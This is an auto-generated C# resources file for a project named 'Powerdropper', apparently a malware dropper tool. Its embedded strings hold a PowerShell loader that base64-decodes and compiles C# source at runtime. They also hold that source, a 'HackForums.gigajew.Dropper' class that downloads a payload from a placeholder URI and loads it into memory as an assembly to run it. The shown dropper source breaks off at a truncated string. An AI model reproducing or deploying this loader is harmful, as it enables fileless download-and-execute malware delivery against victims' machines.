//------------------------------------------------------------------------------
// <auto-generated>
//     This code was generated by a tool.
//     Runtime Version:4.0.30319.42000
//
//     Changes to this file may cause incorrect behavior and will be lost if
//     the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------

namespace Powerdropper.Properties {
    using System;
    
    
    /// <summary>
    ///   A strongly-typed resource class, for looking up localized strings, etc.
    /// </summary>
    // This class was auto-generated by the StronglyTypedResourceBuilder
    // class via a tool like ResGen or Visual Studio.
    // To add or remove a member, edit your .ResX file then rerun ResGen
    // with the /str option, or rebuild your VS project.
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "15.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   Returns the cached ResourceManager instance used by this class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Powerdropper.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   Overrides the current thread's CurrentUICulture property for all
        ///   resource lookups using this strongly typed resource class.
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to $whatever = &quot;powershell-data&quot;;$dec = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($whatever));Add-Type -TypeDefinition $dec;$instance = New-Object HackForums.gigajew.Dropper;$instance.Run();.
        /// </summary>
        internal static string loader {
            get {
                return ResourceManager.GetString("loader", resourceCulture);
            }
        }
        
        /// <summary>
        ///   Looks up a localized string similar to using System;using System.IO;using System.Net;using System.Reflection;namespace HackForums.gigajew
        ///{public class Dropper
        ///{private const string TARGET_URI=&quot;MYURI&quot;;private MemoryStream APPLICATION_DATA=new MemoryStream();[STAThread]
        ///public void Run()
        ///{downloadApplicationData();loadApplication();}
        ///private void loadApplication()
        ///{byte[]buffer=APPLICATION_DATA.ToArray();Assembly assembly=AppDomain.CreateDomain(&quot;&quot;).Load(buffer);object[]args=new object[1];if(assembly.EntryPoint.GetParameters().Length&gt;0)
        ///args=null; [rest of string was truncated]&quot;;.
        /// </summary>
        internal static string powersrc {
            get {
                return ResourceManager.GetString("powersrc", resourceCulture);
            }
        }
    }
}
